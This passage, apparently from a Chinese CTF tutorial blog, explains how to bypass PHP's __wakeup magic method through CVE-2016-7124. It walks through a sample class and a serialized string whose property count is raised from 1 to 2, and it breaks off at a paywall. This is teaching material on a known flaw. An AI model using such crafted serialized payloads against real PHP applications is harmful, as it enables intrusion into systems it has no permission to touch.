__wakeup() 在 PHP 中是反序列化时自动调用的函数,当序列化对象属性个数大于实际属性时,能绕过此方法。文章详细介绍了如何利用 CVE-2016-7124 漏洞来绕过 __wakeup,并展示了如何通过修改属性个数来避免执行特定操作,从而影响 __destruct 方法的条件判断。
__wakeup函数是在php在使用反序列化函数unserialize()时,会自动调用的函数。只要序列化的中的成员数大于实际成员数,即可绕过
<?php
class xctf
{
public $flag = '111';
public function __wakeup()
{
exit('bad requests');
}
}
$a=new xctf();
var_dump(serialize($a));得到
string(36) "O:4:"xctf":1:{s:4:"flag";s:3:"111";}"所以把成员数"1",改为"2"即可绕过。
下面再详细讲讲wakeup()方法。
_ _wakeup()作为魔术方法本身有一个漏洞,漏洞编号 CVE-2016-7124,当序列化字符串中表示对象属性个数的值大于真实的属性个数时会跳过__wakeup 的执行。
正
订阅专栏 解锁全文
扫一扫
56万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
